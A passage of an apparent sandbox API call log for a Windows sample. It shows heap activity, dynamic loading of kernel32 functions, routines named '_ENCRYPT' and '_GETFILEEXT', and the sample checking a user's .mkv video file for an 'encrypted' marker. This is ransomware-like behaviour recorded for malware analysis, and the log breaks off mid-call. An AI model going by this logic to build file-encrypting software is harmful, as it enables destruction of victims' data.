(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.070] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.071] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.072] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.073] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.073] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0042.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.073] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.074] CloseHandle (hObject=0x140) returned 1 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.074] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.074] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.075] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.075] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.075] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.075] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.075] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.075] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.075] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.075] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.075] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.075] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x39f1cbd0, ftLastWriteTime.dwHighDateTime=0x1d5b880, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0x7c20c0 [0042.076] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.076] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.076] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x39f1cbd0, ftLastWriteTime.dwHighDateTime=0x1d5b880, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0x7c20c0 [0042.076] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.076] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 